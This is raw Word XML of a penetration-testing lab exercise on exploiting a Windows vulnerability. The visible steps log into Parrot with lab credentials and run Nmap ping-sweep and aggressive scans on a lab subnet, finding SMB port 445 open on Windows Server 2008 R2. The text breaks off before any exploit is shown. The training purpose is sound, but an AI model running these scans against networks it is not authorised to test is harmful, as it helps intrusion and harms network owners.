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D51AC" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="007936"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Network Penetration Testing Methodology-Internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D31E7B" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="007936"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 35 Min Remaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E453D36" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>Instructions Resources </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Help</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  100</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614A0300" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="11" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>Exercise 19: Exploiting Windows OS Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6214A7" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="300"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF3BF6" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">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t>Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>As an expert penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C186B" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">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D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Lab Duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1A8B9" w14:textId="27079449" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1"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465B16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8" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId6" w:name="DefaultOcxName" w:shapeid="_x0000_i1308"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00D86EB7">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0067B8"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Parrot</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Parrot lock screen appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2919C" w14:textId="1F2C329D"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2F6999A3" wp14:editId="3F724E22">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="127118957" name="図 5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FF8BD53" w14:textId="4AA82E5E"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0137BC70">
          <v:shape id="_x0000_i1307" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId9" w:name="DefaultOcxName1" w:shapeid="_x0000_i1307"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is selected as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in the Password field and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64840712" w14:textId="1FC54AF4"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5244CD55" wp14:editId="4DD92DF7">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="425564331" name="図 5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8102949" w14:textId="6BAB3CB7"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34861C02">
          <v:shape id="_x0000_i1306" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId11" w:name="DefaultOcxName2" w:shapeid="_x0000_i1306"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab, we will be scanning a subnet for live machines. Select one machine and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the machine to gain access to it. For doing a quick scan, we will do a ping sweep using Nmap. In this lab, we are choosing an internal network (Subnet D) for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Launch a command line terminal, type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.19.19.1-255</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This displays all the hosts that are up in the network within a minute. In this lab, we are choosing </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>172.19.19.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (Advertisement Dept) as our target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0CB700" w14:textId="5446B5FC"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17ED4DC6" wp14:editId="51C3815D">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1648802470" name="図 5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5D560E8" w14:textId="63FADC94"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05CD5EA1">
          <v:shape id="_x0000_i1305" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId13" w:name="DefaultOcxName3" w:shapeid="_x0000_i1305"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, we shall scan the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machines to view the open ports, services running along with their versions, and the underlying operating system. Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 -A 172.19.19.15</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Nmap takes approximately 3 minutes to complete the scan. Upon scan completion, you will observe that the port </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>445</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is open and the underlying operating system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows Server 2008 R2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Close the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F358F4" w14:textId="33140362"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32B3F4B8" wp14:editId="0F14FBFE">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="359941603" name="図 5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3A87D14" w14:textId="637E2ABE"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3CC01375" wp14:editId="43565EC3">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="611907158" name="図 5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1D34C72" w14:textId="184E412B"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2FB73676">
          <v:shape id="_x0000_i1304" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId16" w:name="DefaultOcxName4" w:shapeid="_x0000_i1304"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, we shall perform a vulnerability scan on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
